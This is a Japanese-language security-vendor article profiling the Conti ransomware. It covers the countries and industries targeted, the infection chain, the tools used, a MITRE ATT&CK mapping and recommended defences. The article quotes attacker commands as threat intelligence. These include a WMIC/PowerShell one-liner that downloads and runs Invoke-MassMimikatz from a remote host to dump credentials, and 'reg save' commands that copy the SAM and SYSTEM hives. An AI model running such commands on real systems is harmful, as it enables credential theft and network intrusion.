ランサムウェアスポットライト：Conti

ランサムウェア「Ryuk」の後継と推測される「Conti」は、最近話題となった各種攻撃でも注目されている悪名高いランサムウェアファミリの1つです。このランサムウェアファミリの詳細を理解することは関連する脅威から企業を守る上で有効となります。

Contiの脅威から企業の安全を守るために何を把握しておくべきでしょうか。

Contiは、Ryukの後継として現在最も悪名高いランサムウェアファミリの1つであり、アイルランドやニュージーランドの医療機関を狙った攻撃など、話題となった攻撃で「サービスとしてのランサムウェア（RaaS）」の形で利用されていました。

また、Contiの攻撃者は、盗取した情報を暴露すると脅すだけではなく、身代金の支払いを拒否した被害組織へのアクセス権を売りつけるなど、二重恐喝の手口も活用していました。

また、このランサムウェアファミリは情報窃取型マルウェア「BazarLoader」とも連携するなどして攻撃を拡大させています。トレンドマイクロの「2021年上半期セキュリティラウンドアップ」によると、2021年上半期に検出台数としては第10位にランクインしていました。

この記事では、企業のインシデント対応担当者やセキュリティ担当者が攻撃を発見する上で有益となるContiの詳細を説明します。

■ 影響を受けた主な産業や国

Contiによる攻撃は、世界中で検知されており、米国では2021年1月1日から11月12日までに100万回を上回る攻撃総数に達しています。そして第2位にオランダ、第3位に台湾がランクインしていました。

図1：Contiの攻撃総数の国別ランキング（2021年1月1日～11月12日）

また、攻撃総数の中でもエンドポイントでの検出台数に絞った場合の業界別ランキングでは、小売業が最も多く、次いで保険、製造業、通信となっています。ヘルスケア業界での被害は、2021年のContiによる攻撃で注目を浴びましたが、検出台数としては第6位にランクインしていました。

図2：Conti検出台数の業界別ランキング（2021年1月1日～11月12日）

■ 感染フローおよび各種手口

図3：Contiの感染フロー

初期侵入

• Contiは、情報窃取型マルウェアBazarLoaderを介して標的の端末に侵入します。そしてBazarLoader自体は、自身をダウンロードするGoogle Driveのリンク付きのフィッシングメールを介して対象の端末に侵入します。
• FortiGateファイアウォールの脆弱性CVE-2018-13379およびCVE-2018-13374を悪用することで、Contiが端末に侵入するケースもあります。この場合、脆弱性の悪用によって侵入した後、正規ツールCobalt Strikeを悪用して端末上で不正活動を展開します。
• その他、ProxyShell Microsoft Exchangeの脆弱性を悪用することで、対象の端末に侵入するケースもあります。

事前調査

• 最初の事前調査には、Whoami、Nltest、Netといったツールが悪用されます。これらのツールは、一般的にはオペレータが作業時に対象となるシステム内の位置や権限に関する情報の取得などに利用されます。
• 攻撃者グループは、二重恐喝の手口を駆使するため、事前調査の段階で情報窃取の対象となるファイルを積極的に探索します。そしてShareFinderなどのツールも使用して、情報漏えいやランサムウェア活動に必要な情報を特定します。

権限昇格

• 攻撃者グループは、ドメインへのフルアクセスを得るため、主にドメイン管理者の認証情報の探索に注力し、Zerologon（CVE-2020-1472）や PrintNightmare（CVE-2021-1675）などの複数の脆弱性を利用して、自身の権限昇格を実施し、感染端末上のネットワーク活動の足場を固める可能性もあります。

クレデンシャルアクセス

• 攻撃者は、感染端末上にキャッシュされた認証情報をダンプし、横移動または特権昇格を可能にします。この場合、ProcDumpなどのツールを使って、感染端末のプロセス/es（通常はlssas.exe）をダンプし、Mimikatzと組み合わせて認証情報をダンプします。
• また、以下のようなEmpireのモジュールmass-mimikatzを使用して、複数の感染端末の認証情報をダンプする場合もあります。
  • Mimikatz (Empireのmass-mimikatz)
    • C:\WINDOWS\SYSTEM32\WBEM\WMIC.exe /node:localhost process call create powershell /c IEX (NewObjectNet.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1’);’24346D,COMPUTERNAME2’|Invoke-MassMimikatz -Verbose > c:/programdata/2.txt

• あるいは、Empire PowerShellのモジュールkerberoastingやツールのRubeusなどを使用することもあります。
• その他、攻撃者は、タスクマネージャーなどのWindowsネイティブツールを使用して、lsassのメモリをダンプしたり、comsvcs DLLファイルのMiniDump機能を使用したりすることもあります。
• パスワードの保管場所から認証情報を取り出す形で認証情報にアクセスすることもあります。
  • その1つが以下のようなコマンド「reg save」を用いる方法です。
    • reg save HKLMSAM C:\programdata↪SamBkup.hiv
    • reg save HKLM⇄SYSTEM C:\programdata⇄FileName.hiv
  • また、Get-GPPPasswordなどのツールを使って、グループポリシーの環境設定に保存されている平文パスワードを取得する可能性もあります。

• SharpChromeやSeatBeltなどのツールを使って、ブラウザやクラウドアプリケーションから認証情報を取得することもあります。
• こうして十分な量の認証情報を得た後、SMBAutoBruteの機能によりパスワードをブルートフォース攻撃するタスクを自動化し、どのパスワードが有効かを確認します。
• これによりドメインアカウントに関する情報を得た後、攻撃者は、Ntdsutilを使用してドメインコントローラの認証情報をダンプします。
• なお、Vssadminを使用して感染端末の画面上のスナップショットを作成します。その際、Ntds.ditもダウンロードしてこの作業を完了します。

水平移動・内部活動

• 攻撃者は、バッチファイルを使用してセキュリティツールを無効にすることができます。バッチファイルは、スケジュールされたタスクによって実行されます。
• 今回の攻撃グループは、AteraやAnyDeskなどのサードパーティツールを使用してリモートシステムを制御することが知られています。
• 脆弱性EternalBlueを突き、この脆弱性が悪用可能なシステムのネットワークを水平移動・内部活動することが知られています。
• さらにPSExecを使用して、スクリプトやランサムウェア自体をリモートで実行します。

検出回避

• 攻撃者は、ランサムウェアの実行直前、ドメイン内でツールの配布を自動化するためのバッチファイルを作成します。これらのツールには、既存のセキュリティソフトウェアを終了させるためのスクリプトが含まれています。
• この際、GMER、PC Hunter、PowerShellなどのツールを使って検出回避の活動を実行します。

実行

• ボット型マルウェアのTrickbotとも連携することで、攻撃者は、ロード型マルウェアのBazarLoaderを介してランサムウェアを実行することができます。この際、Cobalt Strikeを用いて、最終的にランサムウェア活動の実行に至ります。
• 攻撃者は、対象のネットワーク内部に侵入した後、遠隔操作によってスケジュールタスクやバッチファイルの操作を行う傾向があります。
• また、ランサムウェアの実行に際しては、DontSleep.exeなどのプロセスのファイルを使用することで、ファイル実行用のタスクマネージャーを呼び出します。

情報送出

• 攻撃者は、Megaクラウドストレージなどの指定されたクラウドストレージにファイルを同期するオープンソースツールRcloneを使用して、感染端末からの情報送出を実行します。
• ファイル転送ソフトウェアであるWinSCPを使用して情報送出を行うこともあります。

被害規模

• ランサムウェアの感染後、暗号キーのChaCha20とRSA4096を使用することで、ChaChaキーやノンス（暗号通信の使い捨て数値）を介し、対象となるファイルが暗号化されます。
• この際、ランサムウェアは、WMIを使用してシャドウコピーを削除することにより、感染端末の復旧を阻害します。

■ MITRE tactics and techniques

Initial Access（初期侵入）

• T1566 – Phishing
  • BazarLoaderのフィッシングメールを介して侵入する
• T1190 – Exploit public-facing application
  • ファイアウォール関連の脆弱性を利用して侵入する
    • CVE-2018-13379
    • CVE-2018-13374

Execution（不正活動の実行）

• T1106 – Execution through API
  • シャドウコピーの削除などのコマンドを実行するためにネイティブAPIを使用する
• T1059.003 – Command and scripting interpreter: Windows command shell
  • バッチファイルを利用してランサムウェアを配布・実行する
• T1047 – Windows Management Instrumentation
  • WMIを使用してバッチファイルの実行とシャドウコピーの削除を行う
• T1204 – User execution
  • スピアフィッシングのリンクからペイロードを実行するためにユーザーによる実行が必要となる
• T1053.005 – Scheduled task/job: scheduled task
  • ランサムウェアの実行手段としてスケジュールされたタスクを使用する

Persistence（永続化）

• T1053.005 – Scheduled task/job: Scheduled task
  • ランサムウェアの実行手段としてスケジュールされたタスクを使用する

Privilege Escalation（権限昇格）

• T1078.002 – Valid accounts: domain accounts
  • ドメイン管理者アカウントを使用してシステム内の権限を昇格させる
• T1083 – File and directory discovery
  • 暗号化に関連する特定のファイルやディレクトリを検索する
• T1018 – Remote system discovery
  • ARPエントリを列挙してリモートシステムへの配信を可能にする
• T1057 – Process discovery
  • プロセス終了のための特定のプロセスを発見する
• T1016 – System network configuration discovery
  • ARPエントリを列挙してリモートシステムへの配信を可能にする
• T1069.002 – Permission groups discovery: domain groups
  • 権限昇格のためのグループ情報を検索する
• T1082 – System information discovery
  • システムに関する情報をログに記録する
• T1033 – System owner/user discovery
  • 権限昇格のためのユーザー検索を実行する
• T1012 – Query registry
  • 保存されているパスワードを特定のレジストリに問い合わせる
• T1063 – Security software discovery
  • 偵察や強制終了のためにセキュリティソフトを検索する

Credential Access（クレデンシャルアクセス）

• T1003 – OS credential dumping
  • パスワードハッシュの取得に使用するLSASSのメモリをダンプする
• T1555 – Credentials from password stores
  • SharpChrome、Seatbelt、net-GPPPasswordなどのツールを使って、クレデンシャルストアからパスワードを抽出する
• T1552 – Unsecured credentials
  • Mimikatzを使用して認証情報を取得する

Lateral Movement（水平移動・内部活動）

• T1570 – Lateral tool transfer
  • BITSAdminを使用してネットワーク上でツールを転送する
• T1021.002 – Remote services: SMB/Windows admin shares
  • Cobalt Strikeが管理者共有を介してリモートシステムに自身を配布する

Defense Evasion（検出回避）

• T1562.001 – Impair defenses: disable or modify tools
  • セキュリティ関連ソフトウェアを終了する
• T1140 – Deobfuscate/Decode files or information
  • 検出回避のためにランサムウェアを難読化する
• T1055 – Process injection
  • プロセスインジェクションを使用して検出を困難にする

Command and Control（コマンド＆コントロール）

• T1071 – Application Layer Protocol
  • C&Cサーバとの通信にHTTPを使用する
• T1219 – Remote access software
  • AnyDeskやAteraなどのRMMソフトを使用する

Exfiltration（情報送出）

• T1567.002 – Exfiltration over web service: exfiltration to cloud storage
  • Megaクラウドストレージなどの指定したクラウドストレージにファイルを同期する

Impact（被害規模）

• T1486 – Data encrypted for impact
  • ファイルおよび鍵の暗号化にChaCha20とRSA4096を使用する
• T1489 – Service stop
  • PC HunterやGMERなどのツールを使用して特定のセキュリティ関連サービスを終了させる
• T1490 – Inhibit system recovery
  • シャドウコピーの削除にWMICを使用する

■ 使用したマルウェア、ツール、エクスプロイトの概要

企業や組織のセキュリティ部門は、Contiの攻撃でよく使用される以下のマルウェアツール、脆弱性利用ツール（エクスプロイト）に注意する必要があります。

初期侵入

• フィッシングメール
• Firewall exploits (CVE-2018-13379 and CVE-2018-13374)

不正活動の実行

• BazarBackdoor
• Cobalt Strike
• DontSleep

事前調査

• Adfind
• Net
• NetScan
• Nltest
• ShareFinder
• SharpView
• PowerUpSQL
• Whoami

権限昇格

• EternalBlue (Ms17_010)
• Mimikatz
• PowerUpSQL
• PrintNightmare (CVE-2021-1675)
• RouterScan
• Zerologon (CVE-2020-1472)

クレデンシャルアクセス

• EComsvcs.dll
• Mimikatz
• Net-GPPPassword
• Ntdsutil
• PowerShell Empire: Kerberoast
• ProcDump
• RouterScan
• Rubeus
• SharpChrome
• SMB AutoBrute
• Task Manager
• Vssadmin

水平移動・内部活動

• AnyDesk
• Atera
• BITSAdmin
• Cobalt Strike
• EternalBlue
• Mimikatz
• PsExec

検出回避

• AV Uninstall
• Cobeacon
• GMER
• Gpedit
• PCHunter
• PowerTool
• KillAV

情報送出

• Rclone
• WinSCP

コマンド＆コントロール

• Anydesk
• Atera
• Cobalt Strike
• GOST (GO Simple Tunnel)
• NGROK

■ 推奨事項

企業や組織は、これらの脅威を阻止してランサムウェアの攻撃へ対応できる強固な対策を講じるため、自社のセキュリティ関連のリソースを体系的に割り当てることが必要です。

これらの対策に必要なベストプラクティスは以下のとおりとなります。

監査とインベントリの実施

• 資産とデータの棚卸しを実施する
• 許可された機器、許可されていない機器、ソフトウェアなどを特定する
• イベントログ、インシデントログの監査を実施する

設定確認と監視活動の徹底

• ハードウェアおよびソフトウェアの設定管理を確認する
• 管理者権限を付与し、従業員の役割に必要な場合のみアクセスできるようにする
• ネットワークポート、プロトコル、サービスの監視を徹底する
• ファイアウォールやルータなどのネットワークインフラ機器のセキュリティ設定を有効化する
• 正規のアプリケーションのみを実行するソフトウェア許可リストを設定する

修正パッチ適用とアップデートの実施

• 定期的な脆弱性診断の実施を徹底する
• OSおよびアプリケーションのパッチ適用または仮想パッチを活用する
• ソフトウェアやアプリケーションの最新バージョンへのアップデートを徹底する

防御および復旧に備えた活動の実施

• データ保護、バックアップ、リカバリ対策の実施を徹底する
• 多要素認証を導入する

適切なセキュリティソリューションの導入

• サンドボックス解析による不正メールのブロック機能を導入する
• メール、エンドポイント、Web、ネットワークなど、システムのすべてのレイヤーに最新バージョンのセキュリティソリューションを導入する
• システム内の不審なツールの存在など、攻撃の兆候を早期検知する機能を実装する
• AIや機械学習による高度な検知技術を活用する

セキュリティ関連のトレーニングやテストの徹底

• 従業員に対するセキュリティスキルの定期的な研修と評価を実施する
• レッドチーム演習や侵入テストを実施する

■ トレンドマイクロのソリューション

企業や組織は、下記のソリューションによる多層的なアプローチのセキュリティ対策を採用することで、社内システムへのさまざまな侵入経路（エンドポイント、メール、ウェブ、ネットワーク）への防御が可能となります。また、不審なコンポーネントや挙動行動を検出も可能となります。

• 「Trend Micro Vision One™」は、多層防御と動作検知を提供し、ランサムウェアが取り返しのつかない損害をもたらす前に、不審な挙動やツールを早期にブロックすることが可能です。
• 「Trend Micro Cloud One™ Workload Security」は、脆弱性を悪用する既知および未知の脅威を阻止します。こうした防御は、仮想パッチや機械学習などの技術によって実現されます。
• 「Trend Micro™ Deep Discovery™ Email Inspector」は、カスタムサンドボックスと高度な解析技術により、ランサムウェアの侵入口となるフィッシングメールなどの不正なメールを効果的にブロックします。
• 「Trend Micro Apex One™」は、ファイルレス攻撃やランサムウェアなどの高度な脅威に対して、先進技術による自動検知と対応を実現し、エンドポイントの防御を確実なものとします。

■ 感染の痕跡

本記事の感染の痕跡（IOC）は、こちらをご参照ください。なお、これらの指標の詳細は、攻撃ごとに異なる場合があります。

参考記事：

• 「Ransomware Spotlight – CONTI」
  by Trend Micro Research

翻訳：与那城 務（Core Technology Marketing, Trend Micro™ Research）